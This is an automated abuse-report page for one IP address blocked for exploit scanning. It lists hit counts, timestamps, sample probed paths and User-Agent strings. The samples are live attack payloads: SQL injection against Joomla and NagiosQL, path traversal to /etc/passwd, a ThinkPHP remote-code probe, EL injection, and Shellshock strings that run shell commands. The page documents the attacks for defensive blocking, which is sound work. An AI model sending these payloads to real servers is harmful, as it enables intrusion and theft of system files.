abuseip.org
- Reason
- suspicious paths across 1 domains
- Hits (last hour)
- 58
- Unique targets hit
- 1
- Unique paths probed
- 880
- Detection count
- 1
- First seen
- 2026-07-24 15:18:16 UTC
- Last seen
- 2026-07-24 16:37:04 UTC
- Block expires
- 2026-07-25 16:37:21 UTC
Sample paths probed
- /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(42808163)),1)
- /glpi/ajax/telemetry.php
- /html/common/forward_js.jsp?FORWARD_URL=http://example.com
- /.//WEB-INF/weblogic.xml
- /plugins/servlet/groupexportforjira/admin/json
- /live_mfg.shtml
- /admin-console/index.seam?actionOutcome=/pwn.xhtml%3fpwned%3d%23%7b8077327*9125382%7d
- /userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
- /password_change.cgi
- /nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5(2066082540))%23
- /api/filemanager?path=%2F..%2f..%2f
- /weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27
- /plus/download.php?open=1&link=aHR0cHM6Ly93d3cuZHUxeDNyMTIuY29t
- /fetchBody?id=1/../../../../../../../../etc/passwd
- /vpn/../vpns/cfg/smb.conf
- /php/setup.php?step=2&PDF2SWF_PATH=printf%20xaigae%25%25xaigae%20%3e%20thwdoi
- /admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php
- /_async/AsyncResponseService
- /System/Info/Public
- /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=MD5&vars[1][]=909551872
Sample User-Agents
- () { :; }; echo ; echo ; /bin/cat /etc/passwd
- Report Runner
- TNAS
- Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
- Nacos-Server
- () { :; }; echo; echo; /bin/bash -c 'expr 865130580 + 960919876'
- Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse โ typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.